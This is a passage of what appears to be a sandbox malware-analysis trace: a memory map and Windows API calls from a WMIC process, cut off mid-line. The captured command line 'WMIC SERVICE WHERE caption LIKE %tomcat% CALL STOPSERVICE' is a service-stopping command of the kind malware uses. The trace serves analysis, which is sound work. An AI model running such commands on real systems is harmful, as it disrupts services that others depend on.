end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2823 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2824 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2825 start_va = 0x7480000 end_va = 0x75dffff entry_point = 0x0 region_type = private name = "private_0x0000000007480000" filename = "" Region: id = 2826 start_va = 0x1050000 end_va = 0x1050fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001050000" filename = "" Region: id = 2827 start_va = 0x1190000 end_va = 0x1247fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 2828 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 2829 start_va = 0x1050000 end_va = 0x1053fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001050000" filename = "" Region: id = 2830 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2831 start_va = 0x56b0000 end_va = 0x57affff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 2832 start_va = 0x57f0000 end_va = 0x57fffff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 2833 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2834 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2835 start_va = 0x1250000 end_va = 0x128ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 2836 start_va = 0x57b0000 end_va = 0x57effff entry_point = 0x0 region_type = private name = "private_0x00000000057b0000" filename = "" Region: id = 2837 start_va = 0x5800000 end_va = 0x583ffff entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 2838 start_va = 0x5840000 end_va = 0x587ffff entry_point = 0x0 region_type = private name = "private_0x0000000005840000" filename = "" Region: id = 2839 start_va = 0x5880000 end_va = 0x58bffff entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 2840 start_va = 0x58c0000 end_va = 0x58fffff entry_point = 0x0 region_type = private name = "private_0x00000000058c0000" filename = "" Region: id = 2841 start_va = 0x5950000 end_va = 0x595ffff entry_point = 0x0 region_type = private name = "private_0x0000000005950000" filename = "" Region: id = 2842 start_va = 0x7f467000 end_va = 0x7f469fff entry_point = 0x0 region_type = private name = "private_0x000000007f467000" filename = "" Region: id = 2843 start_va = 0x7f46a000 end_va = 0x7f46cfff entry_point = 0x0 region_type = private name = "private_0x000000007f46a000" filename = "" Region: id = 2844 start_va = 0x7f46d000 end_va = 0x7f46ffff entry_point = 0x0 region_type = private name = "private_0x000000007f46d000" filename = "" Region: id = 2845 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2846 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2847 start_va = 0x1290000 end_va = 0x12a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 2848 start_va = 0x5900000 end_va = 0x5928fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005900000" filename = "" Thread: id = 208 os_tid = 0xdfc [0110.417] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0110.417] __set_app_type (_Type=0x1) [0110.417] __p__fmode () returned 0x77ac4d6c [0110.417] __p__commode () returned 0x77ac5b1c [0110.417] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0110.418] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0110.418] ??0CHString@@QAE@XZ () returned 0x13495ec [0110.418] ??0CHString@@QAE@XZ () returned 0x13498fc [0110.418] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0110.418] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0110.418] _onexit (_Func=0x1340a20) returned 0x1340a20 [0110.418] _onexit (_Func=0x1340a30) returned 0x1340a30 [0110.418] _onexit (_Func=0x1340a50) returned 0x1340a50 [0110.419] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0110.419] ResolveDelayLoadedAPI () returned 0x770fcd50 [0110.419] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0110.421] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0110.426] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0x1096a98) returned 0x0 [0110.437] GetCurrentProcess () returned 0xffffffff [0110.437] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xd6f724 | out: TokenHandle=0xd6f724*=0x158) returned 1 [0110.437] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xd6f720 | out: TokenInformation=0x0, ReturnLength=0xd6f720) returned 0 [0110.437] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x1073a08, TokenInformationLength=0x118, ReturnLength=0xd6f720 | out: TokenInformation=0x1073a08, ReturnLength=0xd6f720) returned 1 [0110.437] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x1073a08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0110.437] CloseHandle (hObject=0x158) returned 1 [0110.438] SetThreadUILanguage (LangId=0x0) returned 0x409 [0110.440] _vsnwprintf (in: _Buffer=0x1073a98, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xd6f6ac | out: _Buffer="ms_409") returned 6 [0110.440] GetComputerNameW (in: lpBuffer=0x1073ae0, nSize=0xd6f710 | out: lpBuffer="LHNIWSJ", nSize=0xd6f710) returned 1 [0110.440] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.440] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.440] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0110.440] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xd6f724 | out: lpNameBuffer=0x0, nSize=0xd6f724) returned 0x0 [0110.441] GetLastError () returned 0xea [0110.441] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1073b20, nSize=0xd6f724 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0xd6f724) returned 0x1 [0110.441] lstrlenW (lpString="") returned 0 [0110.441] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.441] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0110.442] lstrlenW (lpString=".") returned 1 [0110.442] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.442] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0110.442] lstrlenW (lpString="LOCALHOST") returned 9 [0110.442] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.442] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0110.442] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.442] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.442] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0110.442] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.442] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.442] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.442] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.442] ResolveDelayLoadedAPI () returned 0x77bb9840 [0110.445] SysStringLen (param_1="IDENTIFY") returned 0x8 [0110.445] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0110.446] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0110.446] SysStringLen (param_1="IDENTIFY") returned 0x8 [0110.446] SysStringLen (param_1="IMPERSONATE") returned 0xb [0110.446] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0110.446] SysStringLen (param_1="IMPERSONATE") returned 0xb [0110.446] SysStringLen (param_1="IDENTIFY") returned 0x8 [0110.446] SysStringLen (param_1="IDENTIFY") returned 0x8 [0110.446] SysStringLen (param_1="IMPERSONATE") returned 0xb [0110.446] SysStringLen (param_1="DELEGATE") returned 0x8 [0110.446] SysStringLen (param_1="IDENTIFY") returned 0x8 [0110.446] SysStringLen (param_1="DELEGATE") returned 0x8 [0110.446] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0110.446] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0110.446] SysStringLen (param_1="DELEGATE") returned 0x8 [0110.446] SysStringLen (param_1="NONE") returned 0x4 [0110.446] SysStringLen (param_1="DEFAULT") returned 0x7 [0110.446] SysStringLen (param_1="DEFAULT") returned 0x7 [0110.446] SysStringLen (param_1="NONE") returned 0x4 [0110.446] SysStringLen (param_1="CONNECT") returned 0x7 [0110.446] SysStringLen (param_1="DEFAULT") returned 0x7 [0110.447] SysStringLen (param_1="CALL") returned 0x4 [0110.447] SysStringLen (param_1="DEFAULT") returned 0x7 [0110.447] SysStringLen (param_1="CALL") returned 0x4 [0110.447] SysStringLen (param_1="CONNECT") returned 0x7 [0110.447] SysStringLen (param_1="PKT") returned 0x3 [0110.447] SysStringLen (param_1="DEFAULT") returned 0x7 [0110.447] SysStringLen (param_1="PKT") returned 0x3 [0110.447] SysStringLen (param_1="NONE") returned 0x4 [0110.447] SysStringLen (param_1="NONE") returned 0x4 [0110.447] SysStringLen (param_1="PKT") returned 0x3 [0110.447] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0110.447] SysStringLen (param_1="DEFAULT") returned 0x7 [0110.447] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0110.447] SysStringLen (param_1="NONE") returned 0x4 [0110.447] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0110.447] SysStringLen (param_1="PKT") returned 0x3 [0110.447] SysStringLen (param_1="PKT") returned 0x3 [0110.447] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0110.447] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0110.447] SysStringLen (param_1="DEFAULT") returned 0x7 [0110.447] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0110.447] SysStringLen (param_1="PKT") returned 0x3 [0110.447] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0110.447] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0110.447] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0110.447] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0110.448] GetSystemDirectoryW (in: lpBuffer=0x10729d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.448] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0110.448] SysStringLen (param_1="\\wbem\\") returned 0x6 [0110.448] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0110.448] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0110.448] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0110.448] GetCurrentThreadId () returned 0xdfc [0110.448] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xd6f234 | out: phkResult=0xd6f234*=0x164) returned 0x0 [0110.448] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xd6f240, lpcbData=0xd6f23c*=0x400 | out: lpType=0x0, lpData=0xd6f240*=0x30, lpcbData=0xd6f23c*=0x4) returned 0x0 [0110.448] _wcsicmp (_String1="0", _String2="1") returned -1 [0110.448] _wcsicmp (_String1="0", _String2="2") returned -2 [0110.448] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xd6f23c*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xd6f23c*=0x42) returned 0x0 [0110.449] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x1072be0, lpcbData=0xd6f23c*=0x42 | out: lpType=0x0, lpData=0x1072be0*=0x25, lpcbData=0xd6f23c*=0x42) returned 0x0 [0110.449] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0110.449] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0110.449] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xd6f240, lpcbData=0xd6f23c*=0x400 | out: lpType=0x0, lpData=0xd6f240*=0x36, lpcbData=0xd6f23c*=0xc) returned 0x0 [0110.449] _wtol (_String="65536") returned 65536 [0110.449] RegCloseKey (hKey=0x0) returned 0x6 [0110.449] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xd6f6d4 | out: ppv=0xd6f6d4*=0x12d45a8) returned 0x0 [0110.457] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x12d45a8, xmlSource=0xd6f654*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xd6f6b8 | out: isSuccessful=0xd6f6b8*=0xffff) returned 0x0 [0110.503] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x12d45a8, DOMElement=0xd6f6cc | out: DOMElement=0xd6f6cc) returned 0x0 [0110.504] SysStringLen (param_1="VALUE") returned 0x5 [0110.504] SysStringLen (param_1="TABLE") returned 0x5 [0110.504] SysStringLen (param_1="TABLE") returned 0x5 [0110.504] SysStringLen (param_1="VALUE") returned 0x5 [0110.504] SysStringLen (param_1="LIST") returned 0x4 [0110.504] SysStringLen (param_1="TABLE") returned 0x5 [0110.505] SysStringLen (param_1="RAWXML") returned 0x6 [0110.505] SysStringLen (param_1="TABLE") returned 0x5 [0110.505] SysStringLen (param_1="RAWXML") returned 0x6 [0110.505] SysStringLen (param_1="LIST") returned 0x4 [0110.505] SysStringLen (param_1="LIST") returned 0x4 [0110.505] SysStringLen (param_1="RAWXML") returned 0x6 [0110.505] SysStringLen (param_1="HTABLE") returned 0x6 [0110.505] SysStringLen (param_1="TABLE") returned 0x5 [0110.505] SysStringLen (param_1="HTABLE") returned 0x6 [0110.505] SysStringLen (param_1="LIST") returned 0x4 [0110.505] SysStringLen (param_1="HFORM") returned 0x5 [0110.505] SysStringLen (param_1="TABLE") returned 0x5 [0110.505] SysStringLen (param_1="HFORM") returned 0x5 [0110.506] SysStringLen (param_1="LIST") returned 0x4 [0110.506] SysStringLen (param_1="HFORM") returned 0x5 [0110.506] SysStringLen (param_1="HTABLE") returned 0x6 [0110.506] SysStringLen (param_1="XML") returned 0x3 [0110.506] SysStringLen (param_1="TABLE") returned 0x5 [0110.506] SysStringLen (param_1="XML") returned 0x3 [0110.506] SysStringLen (param_1="VALUE") returned 0x5 [0110.506] SysStringLen (param_1="VALUE") returned 0x5 [0110.506] SysStringLen (param_1="XML") returned 0x3 [0110.506] SysStringLen (param_1="MOF") returned 0x3 [0110.506] SysStringLen (param_1="TABLE") returned 0x5 [0110.506] SysStringLen (param_1="MOF") returned 0x3 [0110.506] SysStringLen (param_1="LIST") returned 0x4 [0110.506] SysStringLen (param_1="MOF") returned 0x3 [0110.506] SysStringLen (param_1="RAWXML") returned 0x6 [0110.506] SysStringLen (param_1="LIST") returned 0x4 [0110.506] SysStringLen (param_1="MOF") returned 0x3 [0110.507] SysStringLen (param_1="CSV") returned 0x3 [0110.507] SysStringLen (param_1="TABLE") returned 0x5 [0110.507] SysStringLen (param_1="CSV") returned 0x3 [0110.507] SysStringLen (param_1="LIST") returned 0x4 [0110.507] SysStringLen (param_1="CSV") returned 0x3 [0110.507] SysStringLen (param_1="HTABLE") returned 0x6 [0110.507] SysStringLen (param_1="CSV") returned 0x3 [0110.507] SysStringLen (param_1="HFORM") returned 0x5 [0110.507] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.507] SysStringLen (param_1="TABLE") returned 0x5 [0110.507] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.508] SysStringLen (param_1="VALUE") returned 0x5 [0110.508] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.508] SysStringLen (param_1="XML") returned 0x3 [0110.508] SysStringLen (param_1="XML") returned 0x3 [0110.508] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.508] SysStringLen (param_1="texttablewsys") returned 0xd [0110.508] SysStringLen (param_1="TABLE") returned 0x5 [0110.508] SysStringLen (param_1="texttablewsys") returned 0xd [0110.508] SysStringLen (param_1="XML") returned 0x3 [0110.508] SysStringLen (param_1="texttablewsys") returned 0xd [0110.508] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.508] SysStringLen (param_1="XML") returned 0x3 [0110.508] SysStringLen (param_1="texttablewsys") returned 0xd [0110.508] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.508] SysStringLen (param_1="TABLE") returned 0x5 [0110.508] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.508] SysStringLen (param_1="XML") returned 0x3 [0110.508] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.509] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.509] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.509] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.509] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0110.509] SysStringLen (param_1="TABLE") returned 0x5 [0110.509] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0110.509] SysStringLen (param_1="XML") returned 0x3 [0110.509] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0110.509] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.509] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0110.509] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.509] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.509] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0110.509] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0110.509] SysStringLen (param_1="TABLE") returned 0x5 [0110.509] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0110.509] SysStringLen (param_1="XML") returned 0x3 [0110.509] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0110.509] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.510] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0110.510] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.510] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.510] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0110.510] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0110.510] SysStringLen (param_1="TABLE") returned 0x5 [0110.510] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0110.510] SysStringLen (param_1="XML") returned 0x3 [0110.510] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0110.510] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.510] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0110.510] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.510] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0110.510] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0110.510] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.510] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0110.510] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0110.510] SysStringLen (param_1="TABLE") returned 0x5 [0110.510] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0110.511] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.511] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0110.511] SysStringLen (param_1="XML") returned 0x3 [0110.511] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0110.511] SysStringLen (param_1="texttablewsys") returned 0xd [0110.511] SysStringLen (param_1="XML") returned 0x3 [0110.511] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0110.511] SysStringLen (param_1="htable-sortby") returned 0xd [0110.511] SysStringLen (param_1="TABLE") returned 0x5 [0110.511] SysStringLen (param_1="htable-sortby") returned 0xd [0110.511] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.511] SysStringLen (param_1="htable-sortby") returned 0xd [0110.511] SysStringLen (param_1="XML") returned 0x3 [0110.511] SysStringLen (param_1="htable-sortby") returned 0xd [0110.511] SysStringLen (param_1="texttablewsys") returned 0xd [0110.511] SysStringLen (param_1="htable-sortby") returned 0xd [0110.511] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0110.511] SysStringLen (param_1="XML") returned 0x3 [0110.511] SysStringLen (param_1="htable-sortby") returned 0xd [0110.512] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0110.512] SysStringLen (param_1="TABLE") returned 0x5 [0110.512] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0110.512] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.512] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0110.512] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.512] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0110.512] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0110.512] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.512] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0110.512] SysStringLen (param_1="wmiclimofformat") returned 0xf [0110.512] SysStringLen (param_1="TABLE") returned 0x5 [0110.512] SysStringLen (param_1="wmiclimofformat") returned 0xf [0110.512] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.512] SysStringLen (param_1="wmiclimofformat") returned 0xf [0110.512] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.512] SysStringLen (param_1="wmiclimofformat") returned 0xf [0110.512] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0110.512] SysStringLen (param_1="wmiclimofformat") returned 0xf [0110.512] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0110.512] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.512] SysStringLen (param_1="wmiclimofformat") returned 0xf [0110.513] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0110.513] SysStringLen (param_1="TABLE") returned 0x5 [0110.513] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0110.513] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.513] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0110.513] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.513] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0110.513] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0110.513] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0110.513] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0110.513] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0110.513] SysStringLen (param_1="TABLE") returned 0x5 [0110.513] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0110.513] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0110.513] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0110.513] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0110.513] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0110.513] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0110.513] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0110.513] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0110.513] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0110.513] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0110.514] FreeThreadedDOMDocument:IUnknown:Release (This=0x12d45a8) returned 0x0 [0110.514] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE" [0110.514] memcpy_s (in: _Destination=0x1078040, _DestinationSize=0x7e, _Source=0x1091588, _SourceSize=0x7c | out: _Destination=0x1078040) returned 0x0 [0110.514] GetLocalTime (in: lpSystemTime=0xd6f67c | out: lpSystemTime=0xd6f67c*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0x3, wMilliseconds=0x17b)) [0110.514] _vsnwprintf (in: _Buffer=0x10780c8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xd6f65c | out: _Buffer="04-15-2018T10:09:03") returned 19 [0110.514] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' 